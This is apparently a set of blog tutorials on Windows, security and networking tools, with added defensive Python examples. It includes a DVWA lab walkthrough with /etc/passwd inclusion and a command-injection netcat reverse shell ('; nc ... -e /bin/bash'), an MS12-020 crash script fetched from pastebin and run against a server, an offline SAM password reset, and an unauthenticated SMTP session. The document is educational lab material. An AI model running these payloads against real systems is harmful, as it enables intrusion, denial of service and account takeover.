Process Explorer

Process Explorer, from Microsoft's Sysinternals suite, is Task Manager on steroids. I have been using it for years, and every time I decide to get to the bottom of it I get sidetracked, because it has so many uses. In this tutorial we will look at some of the different tasks Process Explorer can be used for.

Task Manager shows which processes are running and how much memory and CPU they consume. Process Explorer does the same, but is far more specific about what kind of process or service each entry is, which process spawned it, and which DLLs and handles it has open. The main window shows the processes as a tree, so parent/child relationships are visible at a glance. By default, services are highlighted in pink/red and "Own Processes", the processes running under the account you are logged in with, in blue.

Hovering over a process such as svchost.exe reveals a tooltip listing the services hosted in it. svchost.exe is a shared service host, so one instance typically carries several services. In Task Manager it is hard to see which services run inside a given svchost.exe, which is also why malware sometimes disguises itself as svchost.exe. Process Explorer makes the impostors easy to spot: a genuine svchost.exe is started from %SystemRoot%\System32 by services.exe with a -k <group> command line, so a "svchost.exe" sitting under explorer.exe, running from a user profile directory, or with a misspelled name such as svhost.exe does not belong.

Process Explorer also shows the Interrupts (and DPCs) pseudo-process: CPU time spent servicing hardware interrupts and deferred procedure calls, which Task Manager does not attribute to any process. A defective piece of hardware or a faulty driver can cause a so-called interrupt storm that eats CPU, and Process Explorer is where you see it.

Another feature is the "Find Window's Process" target icon on the toolbar: drag it onto any window and Process Explorer selects the process that owns it. This is useful in malware removal, where the process behind a window is often hidden or misnamed in order to fool the user.
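
As an added example that is not part of the original tutorial, here is the svchost.exe sanity check described above done in Python over a process table, rather than by hovering in the GUI. The process table below is constructed for the example; on a real host you would feed it from Process Explorer's File > Save output, from Get-CimInstance Win32_Process, or from an EDR export. The Windows install path (C:\Windows) and the 0.9 name-similarity cut-off are assumptions.

```python
"""Flag svchost.exe impostors in a process listing (added example).

Rules, all visible in Process Explorer's tree and columns:
  * a real svchost.exe lives in %SystemRoot%\System32 (or SysWOW64),
  * its parent is services.exe,
  * it is started with a -k <servicegroup> command line,
  * nothing else should carry a name that merely resembles svchost.exe.
"""
import difflib
from typing import Dict, List, NamedTuple


class Proc(NamedTuple):
    pid: int
    ppid: int
    name: str
    path: str
    cmdline: str


# Assumption: Windows is installed in C:\Windows.
LEGIT_SVCHOST_PATHS = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\syswow64\svchost.exe",
}
# svhost/scvhost/svch0st score >= 0.9 against svchost.exe; the legitimate sihost.exe scores 0.86.
LOOKALIKE_CUTOFF = 0.9


def lookalike(name: str, target: str = "svchost.exe") -> bool:
    """True for names that resemble, but are not exactly, svchost.exe."""
    n = name.strip().lower()
    if n == target:
        return False
    return difflib.SequenceMatcher(None, n, target).ratio() >= LOOKALIKE_CUTOFF


def audit_svchost(procs: List[Proc]) -> Dict[int, List[str]]:
    """Return {pid: [reasons]} for every process that breaks one of the rules."""
    by_pid = {p.pid: p for p in procs}
    findings: Dict[int, List[str]] = {}
    for p in procs:
        reasons = []
        if lookalike(p.name):
            reasons.append(f"name {p.name!r} imitates svchost.exe")
        elif p.name.lower() == "svchost.exe":
            if p.path.lower() not in LEGIT_SVCHOST_PATHS:
                reasons.append(f"image path {p.path!r} is not the System32 svchost.exe")
            parent = by_pid.get(p.ppid)
            parent_name = parent.name if parent else "<unknown>"
            if parent_name.lower() != "services.exe":
                reasons.append(f"parent is {parent_name}, not services.exe")
            if " -k " not in f" {p.cmdline.lower()} ":
                reasons.append("no -k <group> argument; the real svchost is always started with one")
        if reasons:
            findings[p.pid] = reasons
    return findings


# Constructed sample listing: two real svchost instances, Skype, and two impostors.
SAMPLE_PROCS = [
    Proc(4, 0, "System", "", ""),
    Proc(500, 400, "wininit.exe", r"C:\Windows\System32\wininit.exe", "wininit.exe"),
    Proc(600, 500, "services.exe", r"C:\Windows\System32\services.exe", r"C:\Windows\System32\services.exe"),
    Proc(700, 600, "svchost.exe", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe -k netsvcs"),
    Proc(704, 600, "svchost.exe", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted"),
    Proc(1400, 1300, "explorer.exe", r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE"),
    Proc(1720, 1400, "Skype.exe", r"C:\Program Files (x86)\Skype\Phone\Skype.exe", r'"C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized'),
    Proc(2100, 1400, "svchost.exe", r"C:\Users\bob\AppData\Roaming\svchost.exe", r"C:\Users\bob\AppData\Roaming\svchost.exe"),
    Proc(2200, 600, "svhost.exe", r"C:\Windows\svhost.exe", "svhost.exe"),
]

if __name__ == "__main__":
    for pid, reasons in sorted(audit_svchost(SAMPLE_PROCS).items()):
        print(f"PID {pid}:")
        for reason in reasons:
            print(f"  - {reason}")
```

Run against the sample table, PID 2100 is reported three times over (wrong path, wrong parent, no -k group) and PID 2200 once for its look-alike name; the two genuine instances and everything else pass.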

The columns can be customized to show a wide range of information about each process. Let's add a few that I have found useful.

1. Download Process Explorer from the Sysinternals site and run procexp.exe (no installation is needed)

2. Right-click the column header bar and click Select Columns...

The Select Columns dialog box opens.

3. On the Process Image tab, check the two boxes Command Line and Autostart Location and press OK

These two options add two columns to the main window. The first shows the full command line the process was started with. This is useful if, for example, you want to script something and do not know which parameters a particular program expects.

The second shows how the process was made to start automatically: from a Run key in the registry, from Task Scheduler, or from a shortcut in the Startup folder.


Let's say you would like to change the registry entry that starts an application at logon.

4. Double-click the process, here Skype.exe

The Skype.exe:1720 Properties dialog box opens.

5. On the Image tab, under Autostart Location, press the Explore button

The registry editor opens at the exact location, so you can edit the entry directly. We want to edit the value that starts Skype and add a parameter so that it starts minimized.

6. Double-click the Skype value

The Edit String dialog box opens.

7. Append the parameter /minimized to the Value data field and click OK

8. Close the registry editor

The next time you log on, Skype should start minimized instead of in a full window.

You can also use Process Explorer to find out which process has a file or folder open. If you try to delete a folder and get the "Folder In Use" alert, you can identify the program that is holding it.

9. In Process Explorer press Ctrl+F

The Process Explorer Search dialog box opens (the same as Find > Find Handle or DLL...).

10. Enter the path of the folder you are trying to delete, here C:\test, and click Search

Process Explorer lists every process with an open handle or mapped DLL matching that path, so you can close the right program (or close the individual handle from the process's Handles view) and then delete the folder.

Another feature of Process Explorer is the ability to restart or suspend a process. When buggy software, or even a part of Windows itself, hangs or crashes, it is much easier to restart the process than to kill it and start it again manually.

11. Right-click the process, here explorer.exe

12. Click Restart

I do not use the Suspend option that often, but it is a nice feature which freezes an application completely. Say the system has picked up malware that spawns new processes and hops between them to avoid detection, or a pair of processes that restart each other when one is killed. Suspending them stops all of that without destroying the evidence, so you can work out what they are doing and how to remove them. I recommend this video on what Process Explorer can do for malware removal.

13. Right-click the process, here calc.exe

14. Click Suspend

All of the calculator's threads are now suspended: it cannot run, respond to input, or interact with the system in any way, yet it still holds its memory and handles, which is exactly what you want if you intend to inspect it. To resume the application, right-click the process and click Resume.

These were a few examples of how Process Explorer can be put to use. You can dig much deeper with this tool, and it is a must-have for advanced system debugging.

Local File Inclusion & Remote Command Execution

Local File Inclusion (LFI) is a vulnerability in which an attacker can make a web application include, and usually display or execute, files from the web server's own file system by controlling the path passed to an include statement. It occurs when the application does not properly validate which files it may and may not include. From an attacker's point of view the goal of LFI is usually to read sensitive system information or to escalate to Remote Code Execution (RCE). The purpose of this tutorial is to show the danger of LFI and RCE and why you should always validate the page parameter of an include when building a website.

In this scenario we have a Kali Linux box acting as web server on the IP address 192.168.1.13 and an attacking computer running Windows 8.1 on the IP address 192.168.1.9. We will be using the penetration testing application Damn Vulnerable Web Application (DVWA), which has already been installed on the Linux box.

1. Navigate to your DVWA site, here 192.168.1.13

2. Log in with the username admin and password password

3. Click the File Inclusion button

Note that DVWA has three security levels; to use this exploit the level needs to be set to low. If we click the View Source button, DVWA even shows the source code behind each level for file inclusion:

  • The Low File Inclusion Source lets you include any file you name. You may be limited by the operating system's file permissions, but the PHP code itself places no restriction on which files can be included.
  • The Medium File Inclusion Source is the same, except that it strips http:// and https:// from the parameter, so a URL cannot be passed in directly.
  • Finally, the High File Inclusion Source only allows include.php; anything else produces the message ERROR: File not found!
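
Added example, not DVWA's own PHP: a Python model of the three include filters just described, plus the allowlist that actually fixes the problem. Each resolver takes the attacker-controlled page parameter and returns the path the application would go on to include, or raises when the input is refused. The medium filter is modelled as a single-pass string replace, which is how DVWA implements it and which is what makes it bypassable. WEB_ROOT and the names of the allowed pages other than include.php are assumptions for the example.

```python
"""Model of DVWA's three file-inclusion filters and a proper allowlist (added example)."""
import posixpath
from typing import Dict

WEB_ROOT = "/var/www/vulnerabilities/fi"                                # assumed for the example
ALLOWED_PAGES = {"include.php", "file1.php", "file2.php", "file3.php"}  # assumed menu of pages


class IncludeRefused(Exception):
    """The filter rejected the request (DVWA prints 'ERROR: File not found!')."""


def resolve_low(page: str) -> str:
    # include($page) with no check at all: /etc/passwd, ../../, even a URL if allow_url_include is on.
    return page


def resolve_medium(page: str) -> str:
    # Blacklist: remove the two URL schemes. A single pass, so "hthttp://tp://" survives as "http://",
    # and nothing stops "../" or absolute paths, so the LFI itself is untouched.
    return page.replace("http://", "").replace("https://", "")


def resolve_high(page: str) -> str:
    # Exact match on the one legitimate value.
    if page != "include.php":
        raise IncludeRefused("ERROR: File not found!")
    return page


def resolve_allowlist(page: str) -> str:
    """Hardened version: the parameter must name one of a fixed set of files, and the
    resolved path must still sit under WEB_ROOT (belt and braces against future edits)."""
    if page not in ALLOWED_PAGES:
        raise IncludeRefused("ERROR: File not found!")
    full = posixpath.normpath(posixpath.join(WEB_ROOT, page))
    if posixpath.commonpath([WEB_ROOT, full]) != WEB_ROOT:
        raise IncludeRefused("ERROR: File not found!")
    return full


def compare(page: str) -> Dict[str, str]:
    """What each level would include for a given page parameter ('refused' when blocked)."""
    out = {}
    for level, resolver in (("low", resolve_low), ("medium", resolve_medium),
                            ("high", resolve_high), ("allowlist", resolve_allowlist)):
        try:
            out[level] = resolver(page)
        except IncludeRefused:
            out[level] = "refused"
    return out


if __name__ == "__main__":
    for payload in ("include.php", "/etc/passwd", "../../../../etc/passwd",
                    "hthttp://tp://192.168.1.9/shell.txt"):
        print(f"{payload!r:42} {compare(payload)}")
```

The medium row in the output is the lesson: the blacklist passes /etc/passwd and ../ traversal untouched and can be tricked into emitting the very scheme it strips, while the allowlist refuses everything that is not one of its own pages.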

4. Change the end of the URL from page=include.php to page=/etc/passwd

The content of the local file /etc/passwd is now displayed on the page. This file lists all user accounts on the server. Various other files can be of interest as well, especially web server access and error logs, because their content can be influenced through the requested URL and POST parameters: write PHP code into a log, include the log, and the code runs (log poisoning). In this scenario we will not use LFI to gain RCE, though. Instead, I encourage you to have a look at this video by Chris Andrè Dale.

For RCE we will be exploiting another vulnerability. Again, the security level needs to be set to low. The Ping for FREE function in DVWA lets us run the ping command through the website. If the input is not properly filtered, we can trick the website into executing other commands as well, because the user input is pasted straight into a command string that is handed to the shell.

5. Click the Command Execution button

6. Enter 8.8.8.8; pwd and click the Submit button

What we did was tell the site to ping the IP 8.8.8.8 and then, after the ;, execute the command pwd (print working directory). As you can see both commands ran, and the result of pwd is shown as /var/www/vulnerabilities/exec. Now let's use this vulnerability to get a remote shell from the Kali Linux server back to the attacking Windows 8.1 computer. For this to work both machines need Netcat, and the copy on the server must support the -e option (the traditional netcat does, the OpenBSD variant does not). Further reading on Netcat can be found in the previous Netcat tutorial.

7. On the attacking computer open a command prompt and type nc -lvp 7777

8. In DVWA enter 8.8.8.8; nc -nv 192.168.1.9 7777 -e /bin/bash and click the Submit button

In the command prompt we now see a connection coming in from 192.168.1.13: we have a remote shell on the server. Note that the web page keeps loading, because the PHP script is still waiting for the netcat command to finish, and it will stay like that until the connection is closed.

9. Type pwd and press Enter

10. Type whoami and press Enter

The server answers with the directory it is currently in and the user we are running as (the web server's account, so no root yet). From here on I cannot say what a real attacker would do, but probably nothing nice.


    MS12-020 RDP Vulnerability PoC & Analysis

In March 2012 a vulnerability in the Remote Desktop Protocol (RDP) became public. It affected nearly all Windows versions and is tracked as CVE-2012-0002, fixed by Microsoft security bulletin MS12-020.

In short, the vulnerability allows an attacker to send a sequence of specially crafted RDP packets, which Microsoft rated as potentially giving remote code execution; the public exploits only achieve a crash. It can only be triggered if Remote Desktop is enabled on the system and Network Level Authentication (NLA) is not required, because NLA forces the client to authenticate before the vulnerable MCS connection sequence is processed. There is a lot of technical detail on the subject, which, to be honest, I do not understand to its full extent.

The story goes that the security researcher Luigi Auriemma found and reported this vulnerability to the Zero Day Initiative (ZDI), who reported it to Microsoft. Within days of the bulletin a proof-of-concept (PoC) surfaced on a Chinese site that contained Auriemma's own code, which pointed to a leak from Microsoft's partner program rather than to an independent discovery. Luigi Auriemma's original PoC, which is as simple as sending a specially crafted packet via netcat, can be found here.

An improved version of the Chinese PoC was later released as a Python script, which lets an attacker crash the target machine with a Blue Screen of Death (BSOD). All it takes is the ability to run the script and the IP address of the target.

The purpose of this tutorial is purely educational and serves to prove the importance of always keeping your systems up to date with the latest security patches. In this scenario we have a Windows Server 2008 R2 machine on the IP address 192.168.1.17 and an attacking computer running Kali Linux on the IP address 192.168.1.20.

First let's check whether the Windows server is actually vulnerable. From Microsoft we know that Remote Desktop must be enabled without NLA, and that the update which fixes this vulnerability for Server 2008 R2 is KB2621440.

1. On the Windows server right-click Computer and click Properties

2. Click Remote settings

3. Check that the radio button Allow connections from computers running any version of Remote Desktop (less secure) is selected

Now let's verify that the KB2621440 update is not already installed.

4. Open a command prompt and type wmic qfe | find "KB2621440"

No output means the update is not installed on the server (find is case sensitive, so type the KB exactly as above, or add /I). All criteria for the vulnerability are met. Now let's switch to the attacker's point of view.
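
Before switching sides, here is an added example (not from the original post or from the RDPkill script) of the same precondition check done from the network. Every RDP session opens with an X.224 Connection Request carrying an RDP_NEG_REQ that lists the security protocols the client supports; the server's Connection Confirm answers with an RDP_NEG_RSP (the protocol it selected) or an RDP_NEG_FAILURE (why it refused). Offering only PROTOCOL_RDP therefore reveals whether the server accepts standard RDP security, i.e. whether NLA is required, without touching its settings. The byte layouts follow MS-RDPBCGR 2.2.1.1 and 2.2.1.2; the three sample replies are constructed, not captured from the server in the post.

```python
"""Probe whether an RDP server accepts standard RDP security, i.e. does not require NLA
(added example; layouts per MS-RDPBCGR 2.2.1.1 and 2.2.1.2)."""
import socket
import struct
from typing import Dict

PROTOCOL_RDP, PROTOCOL_SSL, PROTOCOL_HYBRID, PROTOCOL_HYBRID_EX = 0x0, 0x1, 0x2, 0x8
TYPE_RDP_NEG_REQ, TYPE_RDP_NEG_RSP, TYPE_RDP_NEG_FAILURE = 0x01, 0x02, 0x03
FAILURE_CODES = {
    1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER", 3: "SSL_CERT_NOT_ON_SERVER",
    4: "INCONSISTENT_FLAGS", 5: "HYBRID_REQUIRED_BY_SERVER", 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested_protocols: int = PROTOCOL_RDP) -> bytes:
    """TPKT + X.224 Connection Request + RDP_NEG_REQ asking for `requested_protocols`."""
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested_protocols)
    x224 = bytes([0xE0, 0, 0, 0, 0, 0]) + neg_req          # CR code, DST-REF, SRC-REF, class 0
    x224 = bytes([len(x224)]) + x224                        # X.224 length indicator
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224  # TPKT: version 3, reserved, length


def parse_connection_confirm(data: bytes) -> Dict[str, object]:
    """Decode the server's X.224 Connection Confirm into what it negotiated."""
    if len(data) < 11 or data[0] != 3 or struct.unpack(">H", data[2:4])[0] != len(data):
        raise ValueError("not a complete TPKT PDU")
    li = data[4]
    if data[5] & 0xF0 != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    if li == 6:
        # No RDP_NEG_RSP at all: old server, standard RDP security is all it knows.
        return {"kind": "legacy"}
    typ, _flags, length, value = struct.unpack("<BBHI", data[11:19])
    if length != 8:
        raise ValueError("bad negotiation structure length")
    if typ == TYPE_RDP_NEG_RSP:
        return {"kind": "neg_rsp", "selected_protocol": value}
    if typ == TYPE_RDP_NEG_FAILURE:
        return {"kind": "neg_failure", "failure_code": value,
                "failure": FAILURE_CODES.get(value, "unknown")}
    raise ValueError(f"unexpected negotiation type {typ:#x}")


def classify(confirm: Dict[str, object]) -> str:
    """Turn the confirm into the answer that matters for MS12-020."""
    selected = confirm.get("selected_protocol")
    failure = confirm.get("failure_code")
    if confirm["kind"] == "legacy" or selected == PROTOCOL_RDP:
        return "standard RDP security accepted, NLA not required (MS12-020 reachable if unpatched)"
    if selected in (PROTOCOL_HYBRID, PROTOCOL_HYBRID_EX) or failure in (5, 6):
        return "NLA required (MS12-020 not reachable without valid credentials)"
    if failure == 1 or selected == PROTOCOL_SSL:
        return "TLS required but NLA not required (MCS layer still reachable, over TLS)"
    return f"undetermined: {confirm}"


def probe(host: str, port: int = 3389, timeout: float = 5.0) -> str:
    """Live check: offer only PROTOCOL_RDP and see what the server says."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connection_request(PROTOCOL_RDP))
        data = sock.recv(1024)
    return classify(parse_connection_confirm(data))


# Constructed replies for the three cases.
SAMPLE_REPLIES = {
    "any_version_allowed": bytes.fromhex("030000130ed000001234000200080000000000"),  # NEG_RSP, PROTOCOL_RDP
    "nla_required":        bytes.fromhex("030000130ed000001234000300080005000000"),  # NEG_FAILURE, code 5
    "legacy_server":       bytes.fromhex("0300000b06d00000123400"),                  # bare Connection Confirm
}

if __name__ == "__main__":
    for label, reply in SAMPLE_REPLIES.items():
        print(f"{label:20} -> {classify(parse_connection_confirm(reply))}")
    # probe("192.168.1.17") would run the same check against the server from the post.
```

The "any version" radio button in step 3 corresponds to the first sample reply; switching the server to "Allow connections only from computers running Remote Desktop with Network Level Authentication" produces the second, and at that point the script in the next steps has nothing to talk to.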

5. On the Kali Linux machine open a terminal and type wget -O RDPkill.py http://pastebin.com/raw.php?i=G99npvDy

6. Type chmod +x RDPkill.py

What we just did was download the code of the Python script from pastebin into a file called RDPkill.py, then make it executable with chmod (+x is all that is needed; chmod 777 would also make the file world-writable). Read a script like this before running it: it is unauthenticated code from a paste site, and you are about to point it at a machine. All that is left now is to give the script the IP address of the Windows server and fire away.

7. Type python RDPkill.py 192.168.1.17

Game over! The script sends a handful of packets at the unpatched server, and down she goes.

Let's try to take a closer look at what happened. This is somewhat out of my league, but I gave it a try anyway. Please feel free to correct me if I'm way off here. This is the description given by Luigi Auriemma:

    There is an use-after-free vulnerability located in the handling of the maxChannelIds field of the T.125 ConnectMCSPDU packet (offset 0x2c of the provided proof-of-concept) when set to a value minor/equal than 5.
    The problem happens during the disconnection of the user started with RDPWD!NM_Disconnect while the effect of the possible code execution is visible in termdd!IcaBufferAlloc (or termdd!IcaBufferAllocEx on Windows 7/2008) after termdd!IcaGetPreviousSdLink returns an invalid memory pointer.

The script itself contains very little Python. Mostly it is the raw bytes of the packets being sent. I'm not sure, but a wild guess would be that the "Fuck you Chelios" packet is the one that delivers the final punch to the server. I could use Python and ndisasm to disassemble the payload of the packet, but that leads nowhere: these bytes are not machine code, they are the TPKT/X.224/T.125 protocol data units of an RDP connection sequence, so a disassembler only produces garbage from them. Instead, let's look at the traffic in Wireshark, which knows the protocol, filtering out everything except the traffic between the attacking computer and the server.

I believe that this is the so-called "Fuck you Chelios" packet, with the maxChannelIds field at offset 0x2c as in Luigi Auriemma's description.

Following that we have a bunch of T.125 packets from the server to the attacker containing the result rt-no-such-user. Finally there is an RST, ACK packet from the server indicating that the connection has been closed. This again fits the description, which says the problem occurs during disconnection of the user.

The BSOD names termdd.sys (the Remote Desktop Server driver) as the faulting module, which also matches the description: the crash is in termdd!IcaBufferAlloc after termdd!IcaGetPreviousSdLink returns an invalid pointer. With my knowledge this is as far as I get with the analysis.

Finally, installing the security update KB2621440 through Windows Update closes this vulnerability. Thereby, hopefully, proving my point of always keeping your systems up to date.


    ActivPasswordChanger

In a former tutorial I showed how to reset a Windows 7 account password without any tools at all. In that tutorial I mentioned that there are also tools available for this. Since I just lost the password to one of my virtual machines, I decided to make a quick tutorial on how to use such a tool. I will be using Active@ Password Changer (Activpasswordchanger).

This is really basic stuff, I know, but it shows that with the right tools, getting into a local account is child's play unless the system disk is encrypted: the tool simply edits the SAM hive offline, and nothing in Windows can stop that. Locking the boot order and setting a firmware password raise the bar a little, but only full-disk encryption (BitLocker or similar) actually protects the account database. To do this you need a bootable disk containing Activpasswordchanger, and you need to set your BIOS to boot from the CD-ROM drive.

1. Boot from the CD-ROM drive, press 0 and then Enter

We are presented with a menu that lets Activpasswordchanger search automatically for the SAM database, the registry hive in which Windows stores its local accounts and their password hashes.

2. Press 2 and then Enter

The software scans the disk for SAM databases; this can take a little while depending on the size of the disk. Once one has been found, select it to clear a user's password.

3. Press Enter

In this scenario we only have an Administrator and a Guest account on the system. We want to clear the Administrator password, so we choose that account.

4. Press 0 and then Enter

We are now presented with a few options for this account. Password never expires and Clear this User's Password are pre-selected, so all we have to do is accept.

5. Press Y and then Enter

The password has now been removed. Be aware that this is a reset, not a recovery: anything the account protected with its old password through DPAPI, such as EFS-encrypted files or saved credentials, becomes inaccessible. All that is left is to exit the software and reboot.

6. Press Esc, Esc, Esc to exit, remove the disk and restart

The system now starts up and logs on automatically without a password.

    FreeRDP – RD Gateway client for Linux

If you are Googling for software that allows you to use Remote Desktop from a Linux OS through an RD Gateway to another server: stop! I spent hours doing the same with no luck. I tried a bunch of tools, also with no luck. Here are some of the tools I tried which did NOT support this function at the time (Remmina, which is built on the FreeRDP library used below, has since gained RD Gateway settings):

  • Remotedesktop Client
  • Remote Desktop Viewer
  • Remmina Remote Desktop Client
  • 2X Client / Remote Desktop
  • KRDC
  • Jump Desktop
  • Running MS mstsc through Wine

I have previously used iTap Mobile to set up connections through a Remote Desktop Gateway (also known as RD Gateway or TS Gateway) from a Mac. I read that this could also be used on Linux. But when I went to their site, it turned out that iTap mobile has been discontinued because Microsoft released a new Microsoft Remote Desktop app. This app works on Windows, Mac and Android, but Linux is not mentioned anywhere. So I wrote to the iTap team asking them for advice:

    Hi iTap team

    I’m looking for software which can connect me through an RD Gateway
    (or TS gateway) to a terminal server. I can see you are referring to the new “Microsoft Remote Desktop app”
    for Macs and Android.

    But what about Linux users like myself, is there an alternative to iTap now that you guys discontinued iTap?

    This was their reply:

    Hello

    Thank you very much for your interest in iTap mobile RDP.
    Unfortunately, not that I know of. As far as I know iTap mobile RDP was the only RDP client for Linux that offered RD Gateway support.

    We are very sorry for the inconvenience.
    Best regards,
    Stefan

So what did I do? I turned to the wonderful world of open source software. FreeRDP is an awesome project started by Awake Coding, aka Marc-André Moreau. It is still in development, so bugs and missing documentation are to be expected. This tutorial shows how to compile FreeRDP and use it to connect through an RD Gateway to a terminal server from Ubuntu 13.10 32 bit.

First we need Git; if you already have it installed, skip this step.

1. Open a terminal and type sudo apt-get install git

Once Git is installed, let's get the source from GitHub. GitHub no longer serves the unauthenticated git:// protocol, so clone over HTTPS:

2. Type git clone https://github.com/FreeRDP/FreeRDP.git

3. Type cd FreeRDP

We also need a number of dependencies for compiling and running FreeRDP.

4. Type the following and press Enter

sudo apt-get install build-essential git-core cmake libssl-dev libx11-dev libxext-dev libxinerama-dev \
libxcursor-dev libxdamage-dev libxv-dev libxkbfile-dev libasound2-dev libcups2-dev libxml2 libxml2-dev \
libxrandr-dev libgstreamer0.10-dev libgstreamer-plugins-base0.10-dev

Now that we have everything we need, the makefiles must be generated.

5. Type cmake -DCMAKE_BUILD_TYPE=Debug -DWITH_SSE2=ON .

Then start the build.

6. Type make

Once the build has finished, we can install the software itself.

7. Type sudo make install

This takes a while, but hopefully finishes without errors. Once FreeRDP is installed, a little tweaking is needed: the dynamic linker has to be told where the FreeRDP libraries were placed, so we create a config file for it.

8. Type sudo nano /etc/ld.so.conf.d/freerdp.conf

9. Insert the line /usr/local/lib/freerdp

10. Save and exit the file

Now we rebuild the linker cache with ldconfig so that the new path is picked up, and check with the which command that the xfreerdp binary is on the PATH.

11. Type sudo ldconfig

12. Type which xfreerdp

13. Start FreeRDP by typing xfreerdp

FreeRDP should now be installed correctly. If you run into problems, check the wiki on GitHub.

Let's try using FreeRDP to connect to a terminal server through an RD Gateway server. The syntax is as follows:

xfreerdp /v:WORKSTATION /d:DOMAIN /u:USERNAME /p:PASSWORD /g:GATEWAY /gd:GATEWAYDOMAIN /gu:GATEWAYUSERNAME /gp:GATEWAYPASSWORD

But since I am using the same account to authenticate to the RD Gateway and to the terminal server, I only need to give one username and password. (Passing /p: on the command line also leaves the password in your shell history and in the process list; leave it out and xfreerdp will prompt for it.)

14. Type xfreerdp /v:WORKSTATION /d:DOMAIN /u:USERNAME /p:PASSWORD /g:GATEWAY

15. When asked whether you trust the certificate, press y

I get an error that the gateway certificate has changed. Someone has suggested that it is a bug in FreeRDP, because it has to handle both the RD Gateway's certificate and the terminal server's. The quick workaround is the /cert-ignore option, but be clear about what it does: it disables certificate validation entirely, so anyone who can intercept the connection can present their own certificate and capture your credentials. Use it to confirm the bug, not as a permanent setting.

16. Type xfreerdp /cert-ignore /v:WORKSTATION /d:DOMAIN /u:USERNAME /p:PASSWORD /g:GATEWAY

Success: we have connected through the RD Gateway to a terminal server in a protected environment. Remember though that FreeRDP is still in development, so it might be buggy. If anybody knows other software or an easier way to connect to a terminal server through an RD Gateway, please let me know.

    Banner Grabbing and Emailing via Telnet

Telnet is an old network protocol that has been around longer than the Internet itself. It was created to give remote access to network resources. It sends everything in plain text and is therefore highly insecure; nowadays it has largely been replaced by the encrypted Secure Shell (SSH). The telnet client can, however, still be a useful debugging tool.

Other protocols developed in the early days of the Internet are insecure for the same reason: their traffic is sent in plain text as well. Well-known protocols such as HTTP, FTP and SMTP all do this. It also means that nothing stops you from using the telnet client as a raw TCP client and speaking these protocols yourself. It might be impractical, but in a debugging situation it is nice to be able to fire up telnet and, for instance, check that your mail server is responding correctly.

This tutorial shows how to do banner grabbing and how to use telnet to send an email via the SMTP protocol. The Telnet client is an optional Windows feature that has been turned off by default since Windows Vista, so the first thing you have to do is enable it (Control Panel > Programs > Turn Windows features on or off > Telnet Client).


Banner Grabbing with telnet

Telnet can be used to get information about a server. Connect to an open port and send a request, and the service typically answers with information about itself: the OS, the service and its version. From an intruder's point of view this is reconnaissance: it identifies systems running software with known vulnerabilities. This is known as banner grabbing, and it is also a good reason to minimise the version banners on your own servers (for Apache, ServerTokens Prod).

Note that the Windows telnet client does no local echo, so you will not see what you are typing. Furthermore, an HTTP request ends with an empty line, so you have to press Enter twice to send it. This tutorial can also be done with software such as PuTTY, which is a little easier to work with.

1. Open a command prompt and type the following commands one by one, each followed by Enter (and an extra Enter after the request line)

telnet ifconfig.dk 80
HEAD / HTTP/1.0

What we did was connect to the server hosting ifconfig.dk on port 80 and send a HEAD request, which returns only the HTTP headers. Here we can see it is running Apache 2.2.16 on Debian. For the fun of it, let's request the page itself.

2. Type the following commands one by one, each followed by Enter (and an extra Enter after the Host line)

telnet ifconfig.dk 80
GET / HTTP/1.1
Host: ifconfig.dk

Again we connect to the server hosting ifconfig.dk on port 80, but this time we use the GET method and, since this is HTTP/1.1, the mandatory Host header telling the server which site we want. I spared you the HTML that follows, but it is there.


Sending mails via telnet

First we need to find the name of the mail server. This can be done with the tool nslookup.

1. Open a command prompt and type the following commands one by one, each followed by Enter

nslookup
set type=mx
gmail.com

Here we asked for the MX records of the domain gmail.com, that is, the mail servers that accept mail for the domain. They are listed with a priority, where the lowest number means the highest priority. For this tutorial we will use the mail server alt1.gmail-smtp-in.l.google.com.

2. Type the following commands one by one, each followed by Enter

telnet alt1.gmail-smtp-in.l.google.com 25
helo mx.google.com
mail from:
rcpt to:
data
subject: testmail
This is just a test
.

What we just did was connect to one of Google's mail servers on port 25, the SMTP port. We greet the server with helo (strictly, the argument should be our own host name, not the server's; mail servers rarely enforce this but do log it) and it responds "at your service". Then we tell the server which address the mail is coming from and which address to deliver it to, each given in angle brackets after the colon, and the server responds OK to both. Next we say data and it replies "Go ahead"; we enter the headers and text of the mail and finish with a line containing only a single dot, which sends the mail. Note what did not happen: no authentication, and no proof that we own the sender address. That is how plain SMTP works, and it is why spoofed mail is possible and why SPF, DKIM and DMARC exist. Let's check the mailbox and see whether the mail arrived.

Credit goes here and here.
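
Added example (not part of the original post): the two telnet dialogues above driven from Python, so they can be scripted and their replies checked rather than eyeballed. build_head_request and parse_response_head do the HEAD banner grab; smtp_send walks through HELO, MAIL FROM, RCPT TO, DATA and QUIT over any transport object with send() and readline(), stops at the first unexpected reply code, and handles multi-line replies and dot-stuffing. The sample HTTP response, the scripted SMTP replies and the example.org/example.net addresses are constructed; SocketTransport talks to a real server.

```python
"""Banner grabbing and a raw SMTP exchange in Python (added example)."""
import socket
from typing import Callable, Dict, List, Optional, Tuple


def build_head_request(host: str, path: str = "/") -> bytes:
    """The request typed into telnet above; the empty line terminates it."""
    return f"HEAD {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")


def parse_response_head(raw: bytes) -> Tuple[int, Dict[str, str]]:
    """Status code and headers (names lower-cased) from a raw HTTP response."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers


def server_banner(raw: bytes) -> str:
    """The Server header, or '' if the server does not advertise one."""
    return parse_response_head(raw)[1].get("server", "")


class SmtpError(Exception):
    pass


def read_reply(readline: Callable[[], bytes]) -> Tuple[int, List[str]]:
    """Read one SMTP reply; '250-' lines continue it, '250 ' ends it."""
    lines = []
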